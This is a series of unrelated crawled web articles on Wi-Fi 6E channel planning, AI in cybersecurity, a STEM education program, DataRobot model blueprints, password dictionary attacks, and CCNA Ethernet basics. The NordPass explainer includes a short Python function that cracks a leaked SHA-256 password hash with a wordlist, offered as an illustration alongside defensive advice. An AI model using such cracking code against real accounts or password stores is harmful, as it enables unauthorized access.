In 2021, the number of mobile devices almost reached 15 billion and is expected to soon reach 16 billion according to Statista research. With the increase in the number of devices needing to be connected, the amount of data we use during each session has exponentially grown. For example, using TikTok (a popular video sharing platform) for 5 minutes creates almost 100MB of data. Instagram, another popular video and photo-sharing platform, uses nearly 40MB of data in the same timeframe. On the extreme end, watching a 4K ultra high-definition video stream uses close to 6GB of data per hour, while browsing the web uses approximately 15MB per hour, according to our tests. We need to walk the fine line of capacity and throughput to provide the bandwidth for these data-hungry services.
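To put those per-hour figures in perspective, they translate into sustained throughput roughly as follows (a back-of-the-envelope conversion, not a measurement from this article):

    def gb_per_hour_to_mbps(gb_per_hour):
        # 1 GB = 8 gigabits = 8000 megabits, spread evenly over 3600 seconds
        return gb_per_hour * 8 * 1000 / 3600

    print(round(gb_per_hour_to_mbps(6), 1))      # ~13.3 Mbps for a 4K UHD stream
    print(round(gb_per_hour_to_mbps(0.015), 2))  # ~0.03 Mbps for light web browsing

Multiply the first number by a few dozen simultaneous viewers on one AP and the case for wider channels and more spectrum becomes obvious.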
With wired networking, if we needed additional capacity, one could easily add another switch, thus providing additional ports and a known throughput through the uplinks. With wireless networking on the other hand, it is not as easy. Adding an extra AP may not increase wireless capacity as much as you would think. Let’s look at it slightly differently. Imagine you oversee the designing and building of a complex system of roads to get people in and out of your town. The easiest way to accomplish this is to create a single-lane, bi-directional roadway. Traffic can easily flow in their respective lanes in and out of town. Now, fast-forward a few years, and you have a fantastic vibrant downtown center, thus increasing traffic on your single-lane road, which requires you to invest in a multi-lane roadway. Each of these lanes is equivalent to our channels in wireless. The more lanes we have, the more traffic we can support at any time. Once a lane is occupied, though, congestion can start to form. Taking this knowledge back to our original concept of adding APs, we see how if we add that AP to an already occupied channel, we don’t fully introduce additional capacity; it is a limited capacity.
Over the years, our data usage profiles have changed from email and Internet browsing to TikTok, Instagram, and Netflix. How we use these lanes has also evolved, growing from 3 to 12 to 25. But what happens when you run out of room to add lanes? 401 Highway in Ontario, Canada, is one of the busiest in the world. With over a dozen lanes, there can still be congestion, so what if we could fit more data (aka people) into a single vehicle and on a lane simultaneously?
“Adding an extra AP may not increase wireless capacity as much as you would think.“
These heavy data usage applications are oversized loads on a roadway. The average lane is around 3 – 4m in width, a known measurement, just like the bandwidth available in a channel width is a known theoretical maximum. Two lanes are required to clear a payload size of 6m in width. We can accommodate that on the roads by allowing vehicles to straddle both lanes using pilot vehicles and traveling at non-congested times. With wireless, we adapt to these oversized loads by leveraging larger channel widths than 20MHz, such as 40MHz, 80MHz, and even 160MHz, which is done by combining multiple channels into a single channel. Sounds great. Well, there is a downside to this. Our 25 channels in 5GHz suddenly become 12, or even 2 at 160MHz! By combining the 25 channels in 5GHz, we effectively reduce our overall aggregate throughput and capacity. Because of this, more spectrum is needed for wireless devices, and 6GHz solves that need.
6GHz to the Rescue!
6GHz represents the potential for 1200MHz worth of usable spectrum, depending on geographical region. We don’t necessarily need the 59 20MHz channels or even the 29 40MHz channels. The benefit of 6GHz truly is the 14 80MHz or 7 160MHz channels available in addition to the 25 20MHz or 12 40MHz channels in the 5GHz band. Now we can easily direct high data usage devices, such as streaming and virtual reality devices, to associate solely to the 6GHz band, allowing 80MHz and 160MHz channel bandwidth, and letting them band-roam to 5GHz when needed.
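A quick sanity check of those channel counts against the spectrum they occupy, using only the figures quoted in this article:

    channels = {
        "5GHz": {"20MHz": 25, "40MHz": 12, "160MHz": 2},
        "6GHz": {"20MHz": 59, "40MHz": 29, "80MHz": 14, "160MHz": 7},
    }

    for band, widths in channels.items():
        for width, count in widths.items():
            used = count * int(width.rstrip("MHz"))   # total spectrum occupied
            print(band, width, f"{count} channels ~ {used} MHz in use")

Notice how the spectrum that can actually be put to work shrinks as channels get wider, especially in 5GHz; 6GHz gives us enough room that wide channels no longer carry that penalty.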
For the first time in a while, we can have a clean slate that will allow us to start with new design guidelines and no preconceived notions about the “recommended” way of doing things. Client devices are required to support WPA3 to operate in the 6GHz band. This requirement is a driving factor to deploy a new network name (SSID) that solely operates in the 6GHz band. There is no requirement for us to have to support older legacy devices!
To further assist with the allocation of the frequency, three new device classes have been created: Low Power Indoor (LPI) AP, Standard Power (SP) AP, and Very Low Power (VLP) AP.
LPI devices are fixed indoor-only APs and operate in such a way that they reduce their impact on incumbent services already operating within the 6GHz band. By limiting the EIRP (radiated power) to 30dBm at the AP and 24dBm at the client, we will be able to utilize the 1200MHz spectrum at higher channel widths efficiently. LPI AP EIRP limits will be enforced by requiring permanently attached integrated antennas. This removes the ability to add a higher-gain antenna and increase the EIRP above the maximum limits.
SP devices are designed for both indoor and outdoor usage but will operate in only a subset of the 6GHz band: U-NII-5 and U-NII-7. Because these devices are authorized for outdoor use, the maximum EIRP is increased to 36dBm. As this higher EIRP may interfere with existing incumbent users of the 6GHz band, in the US the FCC requires a spectrum management service called Automatic Frequency Coordination (AFC). When an outdoor device comes online, it must communicate with a local AFC system to retrieve a list of allowed and prohibited frequencies based on its geolocation. While this is new to the Wi-Fi world, CBRS and other technologies have used this approach for some time already.
The final device class, VLP, is designed for transportation vehicles such as cars, trains, and others. The maximum EIRP for this class will be around 14 dBm. VLP could also be leveraged for high throughput personal area network devices such as VR headsets. Time will tell what happens with VLP, as the primary focus seems to be on LPI and SP devices.
Regardless of which class of device you deploy on 6GHz, one of the goals is to be better RF neighbors, coordinating usage while allowing the different device classes to coexist. Through these new device classes, we can finally see the real-world benefits of using 80MHz and 160MHz channel widths in the enterprise, not just at home!
The Need for Multi-Gigabit Ethernet
As we use these 80MHz and 160MHz channel widths, we cannot forget about our wired backhaul. The massive channels supporting these data-hungry applications are like the G4 Beijing-Hong Kong-Macau Expressway checkpoint that merges 50 lanes into 20!
As you evaluate new wireless equipment, ensure the Wi-Fi 6E APs you are looking at support 802.3ad Link Aggregation Control Protocol (LACP) or mGig, enabling support for 2.5Gbps or 5Gbps uplinks. It is also worthwhile to pull two cables to every AP now, not just for the sake of redundancy, but to take advantage of LACP on mGig as well, enabling the possibility of dual 2.5Gbps or dual 5Gbps! Imagine pushing all that data traffic from your Wi-Fi 6 devices onto a single gigabit Ethernet connection; with Wi-Fi 6 it is possible to oversubscribe a 1Gbps Ethernet uplink.
We hope you enjoyed this look at Wi-Fi 6 channels and can appreciate that what we once considered the “norm” for channel design should be challenged with Wi-Fi 6. We have 1200MHz worth of new spectrum to set the tone for how we want to leverage it with our plans. Let’s push away from the past and embrace the bandwidth the 6GHz band brings to a new world of devices. And remember, as you design for these new challenges, the EtherScope nXG from NetAlly fully supports Wi-Fi 6 and the 6GHz band for analysis, and mGig Ethernet testing for end-to-end connectivity troubleshooting and validation. For wireless specialists, the AirCheck G3 Wireless Analyzer features all the power of the EtherScope nXG but without wired Ethernet testing (available Q4-2022).
Blake Krone is an independent Mobility Consultant and developer. His primary focus is providing solutions for the next generation of devices and business use cases for many Fortune 500 companies and startups. He has developed training materials and presentations through his experience deploying some of the largest single-site networks, sharing the knowledge and insights gained. When he isn’t designing and deploying networks, he builds data analysis tools and tests client devices and tools. | <urn:uuid:1838053a-e964-4b38-afe9-b95ad5bf4be7> | CC-MAIN-2022-40 | https://www.netally.com/wi-fi-6/wifi-6-designing-for-6ghz-channels/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00187.warc.gz | en | 0.936683 | 2,244 | 2.546875 | 3 |
Financial Services, Marketing, Retail
That promising view of what AI can deliver is not entirely wrong.
From businesses to governments, organizations are starting to face up to the vulnerabilities of everything being online. Sophisticated and disruptive cyber attacks continue to increase in complexity and scale across multiple industries. Areas of critical infrastructure, from energy to critical manufacturing, have vulnerabilities that make them a target for cybercriminals.
Just as businesses and authorities are beginning to understand the role that AI and machine learning will play in protecting them, criminals are using the same tools to get around defenses. With AI and machine learning showing encouraging signs of changing the face of cybersecurity, can these technologies break through the hype to truly help secure cyberspace?
Where Do We Begin?
Fortunately, researchers developing new defenses at companies throughout North America largely agree on both the potential benefits and challenges. And it starts with getting some terminology straight.
“I actually don’t think a lot of these companies are using artificial intelligence. It’s really training machine learning. It’s misleading in some ways to call it AI, and it confuses the hell out of customers.” – Marcin Kleczynski, CEO of the cybersecurity defense firm Malwarebytes, commenting on the correct terminology for AI and machine learning.
It is important to get the terminology straight in order to adapt to security breaches. Since machine learning is a branch of artificial intelligence that refers to technologies that enable computers to learn and adapt through experience, distinguishing between the two provides a vital strategic initiative that businesses need to adapt to in order to truly be prepared for an attack.
Moreover, a weaponized AI in the hands of bad actors is a very worrying concept. However, it also highlights the importance of investing heavily in AI-defense and research. Thankfully, emerging machine-learning models are offering hope and greater protection against these sophisticated and complex threats, bringing to light the well-known “hype” that is surrounding the technologies.
Is it More than a Hype? It’s Complicated
With both sides using the same tools, systems will have the ability to learn patterns and identify deviations in a manner that traditional systems or analysts could only dream of. Traditional protection methods required prior knowledge of a threat type before a defense could be prepared. That luxury is now confined to the history books.
To say that AI is just hype is to ignore the significant breakthroughs that have been made in the field, breakthroughs that are currently living in your smartphone and computer, for example. It also ignores the fact that not every AI has to have human-level intelligence in order to carry out its tasks.
“The answer to whether or not AI is just hype is complicated. The current boom is in some ways the result of companies inflating the abilities of their products, but there are also many companies out there doing extraordinary work. Ultimately, AI has a ways to go, but the advances already out there – advanced driver-assistance systems, facial recognition, voice assistants – are proof enough of the incredible potential that AI has to transform our lives and the way we work,” MediaPost reports.
Advances in technology are now enabling the rise in security systems that are always learning, adapting, and looking for new ways to preempt unseen methods of attack. Essentially, the most significant change is stopping attacks before they even occur.
Businesses should already be thinking about replacing reactive solutions with always online protection that is continuously learning emerging attack methodologies. We are entering a new digital era where AI and machine learning will undoubtedly redefine cybersecurity, and we have to take the appropriate measures to be prepared.
About The Transformational CISO Assembly
In a new digital world driven by data, businesses of all sizes are working tirelessly to secure their networks, devices, and, of course, their data. CISOs need to plan for worst-case scenarios, stay ahead of the latest IT security transformation technology, and maintain their company’s information assets without losing sight of the corporate culture.
The 7th edition of our Transformational CISO Assembly will bring together industry leaders to discuss the latest strategies and innovations in cybersecurity. Join us today; the assembly is now open for applications!
Jenny Schecher is a Client Services Director & Social Media Manager at The Millennium Alliance. Jenny is an avid contributor to our blog, Digital Diary, as well as all social media platforms. When she is not writing about digital transformation and technology, she is working with her team to make visions come to life at our events. (and eating all of NYC's best food.) Follow her on Instagram: @jennyschecs or find her on LinkedIn!
Millennium Membership offers Fortune 1000 C-Level executives, leading public sector/government officials, and thought leaders across a variety of disciplines unique and exclusive opportunities to meet their peers, understand industry developments, and receive introductions to new technology and service advancements to help grow their career and overall company value.
About The Millennium Alliance
Launched in 2017, Digital Diary was created to provide premium content to our members interested in executive education and business transformation. With C-Suite executive and top academic contributors, interviews with industry leaders, and digital transformation insights from technology experts, Digital Diary has all of the professional development tools you need to stay ahead of the curve.
We are dedicated to distributing meaningful opportunities for our reader to increase their personal knowledge, simplify business initiatives, and to have the right information to build their capabilities and leadership skills at every level.
In the midst of disruption across all industries, our members are given the tools they need to digitally transform their organizations.
Joining Mill All is an opportunity unlike any other to connect with the best professionals in your industry and be a part of a community to become the best leader you can be.
500 Companies Attend Each Year | <urn:uuid:b0b89293-cbc2-43c7-bef5-afd73b5e015c> | CC-MAIN-2022-40 | https://mill-all.com/digital-diary/can-artificial-intelligence-overcome-the-hype-to-help-cybersecurity/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335469.40/warc/CC-MAIN-20220930113830-20220930143830-00187.warc.gz | en | 0.947881 | 1,273 | 2.5625 | 3 |
In classrooms across the country every day, students are told to turn off and put away their devices. But we know that having great technology in the hands of students is critical to preparing them to join a 21st century workforce built on ones and zeros.
GDIT is partnering with schools in St. Louis, home to the company’s new geospatial innovation center, to bring innovative, hands-on science, technology, engineering, and math learning opportunities, known as STEM, to classrooms. Created in partnership with STEMBoard, the project-based kits help introduce students to basic coding skills with self-paced activities that teach the fundamentals of coding to students in a fun and accessible way.
These fun coding lessons, called LINGO Lessons, help students learn through experience: “In the Driver’s Seat,” teaches students how to build a driverless automobile’s back-up sensor; “Music through Movement,” teaches students to interact with sensors and build instruments that “play” with a wave of a hand; and “Reaction Time,” teaches students how to build a reactive, two-player game that tests speed by combining sports, electronics, and hand-eye coordination.
GDIT and STEMBoard provided the LINGO lessons to support the STEM-capacity building work GDIT was already doing with non-affluent, on-the-rise schools in the St. Louis area. GDIT is also working with STEMBoard to create a geospatial-intelligence-specific “GEO LINGO” lesson for high school students, helping students visualize and map data, which will be in schools during the next academic year.
To ensure the program’s success, GDIT and STEMBoard worked with teachers to develop the curriculum and training. As the pandemic required certain aspects of the program to be conducted virtually, GDIT and STEMBoard leveraged a blended learning model for introducing and walking students through their LINGO lessons while building institutional capacity by helping teachers learn to present these new tools.
During the fall semester, GDIT engineers and other employees visited classrooms to provide experiences that students could connect with. Many of the students had never met an engineer at all, much less one from a minority background who looks like them. The resources GDIT and STEMBoard brought into the schools are ones the schools might not otherwise have had access to. Meeting real people who have done the work, can talk about it, and want to give back makes it much more real and much easier for the students to see themselves in a STEM career.
“GDIT is increasingly concerned about the widening gap among students who are prepared to join a digital workforce and those who aren’t,” said Deb Davis, vice president mission solutions. “This investment in students, which we look forward to growing, is an investment in the pipeline of future technologists who will work at GDIT’s St. Louis offices and beyond.”
“By providing critical STEM resources to teachers and students, GDIT is directly inspiring the emerging workforce,” STEMBoard founder Aisha Bowe said. “When we bring LINGO to the classroom in St. Louis, we watch students go from ‘I can’t do this,’ to ‘I am doing this,’ to ‘I am immersed in this,’ to ‘I can’t believe people get paid to do this!’ all in the span of a week. It’s really incredible.”
“There’s now a ‘train the trainer’ element to the work that builds institutional capacity in schools,” Aisha continued. “Next year, we can go with GDIT to new schools and reach new students knowing that the teachers we worked with this year are doing the same with their current students.”
The partnership with STEMBoard and with other like-minded organizations in St. Louis is an extension of GDIT’s longstanding commitment to the geospatial community in the region. In 2021, we celebrated our expanded footprint with a new home in the city’s Cortex Innovation Community (CIC), making a significant investment and continuing our commitment to the community. | <urn:uuid:6d3da807-3bc5-478b-8516-d7c04d96291a> | CC-MAIN-2022-40 | https://www.gdit.com/perspectives/latest/inspiring-next-generation-stem-leaders/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335469.40/warc/CC-MAIN-20220930113830-20220930143830-00187.warc.gz | en | 0.960378 | 885 | 3.25 | 3 |
How to Understand a DataRobot Model: Unlocking How a Model Was Made [Part 7]
One of my favorite things about Chinese culture is going out with friends and family for dim sum on the weekend. Dim sum is prepared as small bite-sized portions of food served in small steamer baskets or on small plates. Dim sum dishes are served for brunch or lunch. In my hometown, dim sum is also known as yum cha, and my friends and I would organize large groups to go to Chinatown on the weekend to dine.
But despite my love for dim sum, I’m not well suited to this cuisine. I have a seafood allergy and many dim sum dishes contain shrimp. I’m constantly asking my wife, “What’s in this dumpling?” or “Does this contain seafood?” and waiting for her to translate the dishes into English for me. I know the dishes are going to be yummy, but I also care about what went into them.
Just as I care about the ingredients in my dim sum, some people want to know the ingredients in the machine learning algorithm that powers their artificial intelligence (AI). They want to know how the data was prepared to suit the algorithm, any feature engineering applied to the data, and whether any post-processing was applied to the algorithm’s results.
In the previous blogs in this series, we learned how to assess the model accuracy, which columns and rows are important in the data, and how to discover the patterns in the data that the model is using. In this blog, we will focus on the section of the cheat sheet marked in green above: discovering how to see the data preparation, feature engineering, and post-processing that each blueprint has used. Model blueprints are the core of DataRobot’s technology, encapsulating data processing, feature engineering, and model tuning.
Data processing and feature engineering are often overlooked when building machine learning models, even though they are essential to building a great model and are much more complicated to master. Research shows that “selecting the best model and tuning it leads to approximately a 20% increase in accuracy, up to more than a 60% improvement for certain datasets”. DataRobot’s model blueprints are data science recipes, combining best-practice data science processes as the ingredients, used and tested by the world’s best data scientists, packaged ready to produce high-quality machine learning algorithms. And this production-line quality and accuracy directly impacts the bottom line. One organization that switched to DataRobot’s model blueprints reported saving hundreds of millions of dollars per annum via improved model accuracy.
Historically, data scientists manually created scripts that trained and ran the machine learning algorithms that powered AI. Each script was craftsman made, a work of art, and each one unique. Scripts can be written in many different languages (e.g., Python, Java, Julia or R), but one thing that all scripts have in common is that they are not suitable for a normal business person to understand. Over the past decade, many standard machine learning libraries have been released by the open source community, removing the need to script every detail, but scripts that use these libraries remain too complex for a normal business person to comprehend. Scripted solutions are little better than black box solutions to anyone who is not an experienced data scientist.
In the modern AI-driven organization, there are dozens, if not hundreds, of machine learning algorithms deployed throughout the organization, too many for each and every one to be built manually using complex scripting. Much like modern organizations manage their software, the modern AI-driven organization wants standardization of AI workflows, repeatability, reduced human error, reduced key-man risk, and human-friendly and regulator-friendly documentation of each and every AI.
In the previous blog in this series, we saw how to obtain the mathematical formula for a trained algorithm. But sometimes there is a need to see the inside of the model to see how it prepares the data, newly generated features, and any post-processing it does. For example, one blueprint may improve accuracy by applying credibility weighting, while another may use automated feature engineering to improve accuracy by adding cluster analysis. Sometimes there is a need to find the source of an algorithm, the academic papers behind its methodology, or the open source library from which it was sourced. Maybe the regulator wants to know the details. Maybe your boss, the Analytics Director, wants to know how this model is different from another model that you fitted to this data. Maybe one of your fellow data scientists wants to review your choice of model or wants ideas about what may work for their project. Or maybe one of your business colleagues wants to know whether the text features were used after the other features had first been applied.
Above is a screenshot of a more complex model blueprint for a Gradient Boosted Greedy Trees algorithm fitted to Lending Club’s loan data, used to predict which loans will go bad. Blueprint diagrams always start with a Data box and end with a Prediction box. After the Data box, each feature is split by its data type, so that the most appropriate pre-processing can be applied to prepare it for the algorithm. The next rounds of boxes are for data processing and feature engineering. Then there is a machine learning algorithm taking this data, to learn from, or to calculate new predictions. Sometimes there is an extra step after the machine learning algorithm, where text mining is trained on the residual errors from the main algorithm, or sometimes there is a prediction scaling step after the main algorithm. You can find a quick explanation of this particular blueprint in our blog about automated feature engineering.
To get the documentation for any step, simply click on the box for that step. This will open documentation that explains what that box does within the pipeline and often provides links to published research and/or the open sources libraries it uses.
How to Interpret the Blueprint Diagram Above:
- The features are split by data type into categorical, numeric, and text.
- For categorical features:
- the data is prepared by applying one-hot encoding, and
- new features are generated by counting the occurrences of each category.
- For numeric features:
- the data is prepared by doing missing value imputation, and
- new features are generated by subtracting one numeric field from another, or by dividing one numeric field by another.
- For text features, the raw text data is turned into numeric data, suitable for this machine learning algorithm, by first running text mining algorithms on each of the three text features in this data.
- The main algorithm being used is a Gradient Boosted Greedy Trees Classifier with Early Stopping. Clicking on the box to get the documentation shows us a description of what this algorithm does and tells us that this algorithm was sourced from the scikit-learn library in Python.
- There is no post-processing after the main algorithm. Text mining is used to create primary features to fit against the target column. No scaling of predictions is required.
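DataRobot assembles these pipelines automatically, but for readers who want a feel for what the diagram describes, here is a rough, hand-built approximation in scikit-learn. This is not DataRobot’s implementation: the Lending-Club-style column names are hypothetical, and blueprint steps such as count encoding and numeric feature differences/ratios are omitted for brevity.

```python
# A simplified, hand-rolled approximation of the blueprint above.
from sklearn.compose import ColumnTransformer
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.impute import SimpleImputer
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import OneHotEncoder

preprocess = ColumnTransformer([
    # Categorical features: one-hot encoding
    ("categorical", OneHotEncoder(handle_unknown="ignore"),
     ["purpose", "home_ownership"]),
    # Numeric features: missing value imputation
    ("numeric", SimpleImputer(strategy="median"),
     ["loan_amnt", "annual_inc"]),
    # Text features: a text-mining step turning raw text into numbers
    ("text", TfidfVectorizer(max_features=200), "desc"),
])

model = Pipeline([
    ("preprocess", preprocess),
    ("gbm", GradientBoostingClassifier(     # gradient boosted trees...
        n_estimators=500,
        validation_fraction=0.1,
        n_iter_no_change=20)),              # ...with early stopping
])
# model.fit(X_train, y_train); model.predict_proba(X_new)
```

Even this toy version shows why a visual blueprint is easier for a non-specialist to review than the equivalent code.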
The path to trusting an AI includes knowing whether the way it is using the data is suitable and reasonable. The path to building an AI involves training multiple machine learning algorithms to find the one that best suits your needs, and the only practical way for you to quickly find the model that is suitable is to use automated machine learning, which generates visualizations of the pipelines of each and every blueprint. If your AI is a black box that can’t visualize the pipelines it uses, then it’s time to update to DataRobot for models that you can trust. Click here to arrange for a demonstration of DataRobot’s human-friendly insights, showing how you can trust an AI. | <urn:uuid:7b70d757-3c15-4d27-a73b-2fcb7ed864fd> | CC-MAIN-2022-40 | https://www.datarobot.com/blog/how-to-understand-a-datarobot-model-unlocking-how-a-model-was-made-part-7/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337398.52/warc/CC-MAIN-20221003035124-20221003065124-00187.warc.gz | en | 0.941862 | 1,610 | 2.6875 | 3 |
Learning Password Security Jargon: Dictionary Attack
We, as users, trust companies and service providers to keep our data safe. We hope that they don’t leave any backdoors in their software, properly train their employees, and don’t store usernames and passwords in plaintext.
But everything is not as simple as it might seem. Cybersecurity attacks can affect anyone, and sometimes it may be difficult to protect yourself or your business. But some of them, like dictionary attacks, can be easily prevented.
Learn what a dictionary attack is and what can you do to stop it from happening.
What is a dictionary attack?
A dictionary attack is a systematic method of guessing a password by trying many common words and their simple variations. Attackers use extensive lists of the most commonly used passwords, popular pet names, fictional characters, or literally just words from a dictionary – hence the name of the attack. They also change some letters to numbers or special characters, like “p@ssw0rd”.
Hackers use this attack to gain access to online accounts, but also for file decryption – and that’s an even bigger problem. Most people put at least some effort into securing their email or social media accounts. However, they choose simple, easy-to-remember everyday words to protect the files they share with other people. If sent over an unsafe connection, those files would be very easy to intercept, and guessing the password by using a dictionary attack wouldn’t be a challenge either.
How does a dictionary attack work?
During a dictionary attack, a program systematically enters words from a list as passwords to gain access to a system, account, or encrypted file. A dictionary attack can be performed both online and offline.
In an online attack, the attacker repeatedly tries to log in or gain access like any other user. This type of attack works better if the hacker has a list of likely passwords. If the attack takes too long, it might get noticed by a system administrator or the original user.
During an offline attack, however, there are no network limitations to how many times you can guess the password. To do it, hackers need to get their hands on the password storage file from the system they want to access, so it’s more complicated than an online attack. But once they have the correct password, they will be able to log in without anyone noticing.
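To make the offline case concrete, here is a minimal Python sketch of a dictionary attack against a single unsalted SHA-256 hash. Real cracking tools such as hashcat are vastly faster and handle salts and many hash formats; this is for illustration only.

```python
import hashlib

def crack(target_hash, wordlist):
    for word in wordlist:
        # Try the word itself plus a couple of common "leetspeak" tweaks.
        variants = (word, word.capitalize(),
                    word.replace("a", "@").replace("o", "0"))
        for candidate in variants:
            if hashlib.sha256(candidate.encode()).hexdigest() == target_hash:
                return candidate
    return None

leaked = hashlib.sha256(b"p@ssw0rd").hexdigest()         # pretend this leaked
print(crack(leaked, ["letmein", "password", "qwerty"]))  # -> p@ssw0rd
```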
What is the difference between a brute force attack and a dictionary attack?
Brute force attacks are also used to guess passwords. They mostly rely on the computing power of the attacker’s computer. During a brute force attack, a program also automatically enters combinations of letters, symbols, and numbers, but in this case, they are entirely random. Brute force attacks can also be performed online and offline.
However, there are roughly 1,022,000 words in the English language. By using upper- and lower-case letters and the numbers 0-9 (62 characters in total), you can make 62^8 = 218,340,105,584,896 eight-character passwords. In this case, a dictionary attack is much more likely to succeed, given that the password is a simple English word. And it most likely will be a simple English word. A basic brute force attack would take much more time and is less likely to be successful.
Dictionary attacks are brute force attacks in nature. The only difference is that dictionary attacks are more efficient – they usually don’t need to try as many combinations to succeed. However, if the password is a truly unique one, a dictionary attack won’t work. In that case, using brute force is the only option.
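The arithmetic behind that comparison is easy to check:

```python
# Keyspace size vs. wordlist size, using the figures above.
words = 1_022_000              # rough English vocabulary size
keyspace = 62 ** 8             # upper/lower letters + digits, 8 characters
print(f"{keyspace:,}")         # 218,340,105,584,896
print(f"{keyspace // words:,} times more guesses than one wordlist pass")
```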
How to avoid a password dictionary attack?
The IT department in any organization should take some precautions to protect their systems from dictionary attacks. Online attacks are rather easy to stop. You can use captchas, implement mandatory two-factor authentication, and limit how many times one user can attempt to log in before their account is locked.
It’s a bit more complicated when it comes to offline attacks, though. But you can also use two-factor authentication and set up strict rules concerning passwords: no popular passwords, no common words or phrases, a 12-character minimum, etc. And most importantly, make sure that you don’t store passwords in plaintext.
But what can you do as a user to prevent your accounts from getting hacked? First and foremost – don’t be predictable. The best passwords are words that have no meaning to the general public. Keep in mind that the length of the password is not what makes it strong. It doesn’t matter whether you choose “pachycephalosaurus” or “cat” as your password; a computer takes the same amount of time to try either of them.
So create new words, use special characters originally, or, best of all, use random strings of upper- and lower-case letters, symbols, and numbers.
Having trouble coming up with new passwords? Try our password generator. You can pick what symbols you want to use and create unique, strong passwords for all your accounts. Yes, they are impossible to remember, but they are also impossible to guess. And lucky for you, you no longer need to remember all your passwords.
Just use a password manager, like NordPass, to store all your passwords safely. Only you will have access to them, so you can rest assured that your online accounts are safe.
Subscribe to NordPass news
Get the latest news and tips from NordPass straight to your inbox. | <urn:uuid:78ed2bcf-4ec4-4568-a27c-2a1452977fd3> | CC-MAIN-2022-40 | https://nordpass.com/blog/what-is-a-dictionary-attack/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00187.warc.gz | en | 0.940275 | 1,138 | 3.515625 | 4 |
In preparation for your CCNA exam, we want to make sure we cover the various concepts that you could see on your Cisco CCNA exam. So to assist you, below we have provided a CCNA Ethernet Cliff Notes article. This section will probably be most helpful to review immediately before you take your Cisco CCNA certification exam on test day!
Ethernet is the most common LAN technology in use today. Your Cisco CCNA exam will cover a variety of Ethernet concepts, so we must make sure you are well versed in them to pass your Cisco CCNA exam.
Ethernet was pioneered by Digital, Intel, and Xerox in 1980. The IEEE modified it and set the 802.3 specification. Originally this was used to govern network communications over coaxial cable. This evolved into various other physical topologies using hubs and Cisco switches employing twisted pair Ethernet cabling. This provided greater flexibility in the setup, deployment and performance of the computer networks. Obviously your Cisco routers and Cisco switches will support Ethernet.
Ethernet Transmission Mode
Using your twisted pair Ethernet cable, you have the following duplex modes:
Half Duplex: Uses one pair of wires; only one party is allowed to transmit data at any given time. Uses CSMA/CD. This is similar to walkie-talkie communications, where only one person can speak at a time or neither can be understood through the static interference.
Full Duplex: Uses two pairs of wires, Tx to Rx and Rx to Tx. When connected back-to-back, collisions will not occur. This is similar to a telephone, where two people can talk at the same time and hear each other, so the communications are not canceled out as in half duplex.
Autonegotiation: Ethernet uses a priority scheme to define preferred options; for 100-Mbps and 10-Mbps Ethernet, the lower the priority value, the more preferred the option. Autonegotiation uses a series of Fast Link Pulses (FLPs) to communicate with the device on the other end of the cable.
An 802.2 frame is an 802.3 frame with an LLC header inside the data field.
MAC Address: 48 bits long (6 bytes). The first 24 bits are the IEEE-assigned OUI, which identifies the vendor of the card. The last 24 bits are vendor assigned, which “should” make every MAC address unique, although this is not always the case with some low-cost NICs.
Multicast Address: (0100.5exx.xxxx)
Functional Addresses: Valid only on Token Ring. A functional address identifies one or more interfaces that provide a particular function.
The bits of each byte of a MAC address are reversed when an Ethernet frame is translated to a Token Ring or FDDI frame. Here is an example of the MAC address conversion:
Ethernet MAC: 0200.ECA2.0080
Same MAC in TokenRing: 4000.3745.0001
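A small Python sketch reproducing that per-byte bit reversal:

```python
# Reverse the bit order of each byte of a MAC address, as happens when
# translating between Ethernet and Token Ring/FDDI bit ordering.
def reverse_bits(byte):
    result = 0
    for _ in range(8):
        result = (result << 1) | (byte & 1)
        byte >>= 1
    return result

def ethernet_to_token_ring(mac):
    raw = bytes.fromhex(mac.replace(".", ""))
    flipped = bytes(reverse_bits(b) for b in raw)
    hexstr = flipped.hex()
    return ".".join(hexstr[i:i + 4] for i in range(0, 12, 4))

print(ethernet_to_token_ring("0200.ECA2.0080"))  # -> 4000.3745.0001
```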
Frame Elements –These are the different components that make up a frame.
Cyclic Redundancy Check (CRC): Provides error detection, but not error correction.
Frame Check Sequence (FCS): Located at the end of the frame. Contains the CRC.
DA: Destination MAC address.
SA: Source MAC address.
Preamble: Alternating 0s and 1s used to synchronize the receiving interfaces.
Start Frame Delimiter (SFD/Synch): Follows the Preamble and indicates that frame data will follow.
Length (for 802.3): Lists the frame length.
Type (for Ethernet II): Identifies the upper-layer protocol carried in the data.
Data: Size ranges from 46 to 1500 bytes
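As a quick illustration of this layout, here is a minimal Python sketch that unpacks the DA, SA, and Type/Length fields from the first 14 bytes of a frame (the frame bytes below are invented for the example):

```python
import struct

def parse_header(frame):
    dst, src, type_or_len = struct.unpack("!6s6sH", frame[:14])
    def fmt(mac):
        return ":".join(f"{b:02x}" for b in mac)
    # Values up to 1500 are an 802.3 Length; larger values are an
    # Ethernet II Type (e.g., 0x0800 = IPv4).
    return fmt(dst), fmt(src), hex(type_or_len)

frame = bytes.fromhex("ffffffffffff0200eca200800800") + b"\x00" * 46
print(parse_header(frame))
# ('ff:ff:ff:ff:ff:ff', '02:00:ec:a2:00:80', '0x800')
```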
Ethernet Maximum Length Specifications:
10Base2 (802.3): 185m
10Base5 (802.3): 500m
10BaseT (802.3): 100m
100BaseTx (802.3u): 100m
In preparation for your CCNA exam, we want to make sure we cover the various concepts that you could see on your Cisco CCNA exam. To assist you, above we discussed one of the more difficult CCNA topics: Ethernet. As you progress through your CCNA exam studies, I am sure that with repetition you will find this topic becomes easier. So even though it may be a difficult and confusing concept at first, keep at it, as no one said getting your Cisco certification would be easy! | <urn:uuid:08c5d76b-27ff-4b5d-af48-1c279bc74192> | CC-MAIN-2022-40 | https://www.certificationkits.com/ccna-ethernet-cliff-notes/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334515.14/warc/CC-MAIN-20220925070216-20220925100216-00387.warc.gz | en | 0.870669 | 957 | 3.3125 | 3 |
